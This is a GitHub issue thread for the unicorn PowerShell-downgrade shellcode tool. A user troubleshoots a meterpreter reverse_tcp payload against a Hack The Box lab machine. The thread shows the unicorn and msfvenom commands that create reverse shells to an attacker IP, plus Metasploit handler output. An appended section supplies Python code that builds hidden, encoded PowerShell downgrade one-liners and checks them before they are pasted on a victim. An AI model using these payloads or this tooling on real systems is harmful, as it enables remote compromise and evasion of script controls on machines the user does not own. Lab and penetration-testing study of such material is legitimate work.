trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

No meterpreter being caught by handler #169

Closed (danrneal closed this 6 months ago)

danrneal commented 1 year ago

Magic Unicorn Attack Vector v3.12

$ msfconsole -v
Framework Version: 6.2.32-dev

Command used: /usr/share/unicorn-magic/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.101 31337

I've attached my powershell_attack.txt and unicorn.rc

I start up a handler with msfconsole -r unicorn.rc

[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (unicorn.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (unicorn.rc)> set LHOST 10.10.14.101
LHOST => 10.10.14.101
resource (unicorn.rc)> set LPORT 31337
LPORT => 31337
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.101:31337

I then copy and paste either command from powershell_attack.txt on the victim machine (Arctic from HTB, Microsoft Windows [Version 6.1.7600]) and nothing happens.

I then tested with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.101 LPORT=31337 -f exe > arctic.exe, uploaded and executed that, and caught a meterpreter with the handler, so I know that it is listening in the right place.

Attachments: powershell_attack.txt, unicorn.rc.txt

juansonnn commented 1 year ago

try powershell -version 2 and then paste just the payload.
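As an added illustration of the downgrade one-liner the comment above refers to (this is not unicorn's own generator and not code from the thread), the snippet below builds a `powershell -version 2 ... -EncodedCommand` line from a PowerShell script, decodes such a line back so you can read what will actually run on the victim, and applies two checks worth making before pasting: that the command line requests the 2.0 engine, and that it stays under cmd.exe's 8191-character command-line limit, above which a pasted one-liner is truncated and silently does nothing. The flags `-nop -w hidden -enc` are the usual form of this technique and an assumption here, not necessarily what unicorn emits; the sample script is constructed for this example and only tests from the victim whether the handler address on this page (10.10.14.101:31337) is reachable and which engine version answered.

```python
import base64
import re

# cmd.exe rejects command lines longer than this (documented Windows limit).
# A unicorn-style one-liner pasted into cmd.exe past this length is cut off.
CMD_MAX_LEN = 8191

# Constructed sample script: report the engine version that actually ran and
# try a TCP connect to the handler used on this page. Works on PowerShell 2.0.
CONNECTIVITY_CHECK = (
    "$PSVersionTable.PSVersion\n"
    "$c = New-Object System.Net.Sockets.TcpClient('10.10.14.101', 31337)\n"
    "$c.Connected\n"
    "$c.Close()\n"
)


def build_encoded_command(script: str, ps_version: int = 2) -> str:
    """Wrap a PowerShell script in a downgrade one-liner.

    -EncodedCommand (-enc) expects the script as UTF-16LE, base64 encoded;
    -version N asks for the legacy engine (2.0 here) when it is installed.
    The flag set is an assumption typical of this technique.
    """
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -version {ps_version} -nop -w hidden -enc {encoded}"


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script from a one-liner's -enc / -EncodedCommand argument."""
    m = re.search(r"-(?:enc|EncodedCommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        raise ValueError("no -enc / -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def fits_cmd_exe(cmdline: str) -> bool:
    """True if the whole command line fits within cmd.exe's limit."""
    return len(cmdline) <= CMD_MAX_LEN


def preflight(cmdline: str) -> dict:
    """Checks to run on the generated line before pasting it on the victim."""
    return {
        "downgrade_to_v2": re.search(r"-version\s+2\b", cmdline) is not None,
        "fits_cmd_exe": fits_cmd_exe(cmdline),
        "decoded_script": decode_encoded_command(cmdline),
    }


if __name__ == "__main__":
    line = build_encoded_command(CONNECTIVITY_CHECK)
    for key, value in preflight(line).items():
        print(f"{key}: {value}")
```

If `downgrade_to_v2` is true but the pasted line still produces nothing, paste the decoded script on the victim directly under `powershell -version 2`: the printed PSVersion confirms whether the 2.0 engine is actually present, and `$c.Connected` confirms whether the handler port is reachable from that host at all.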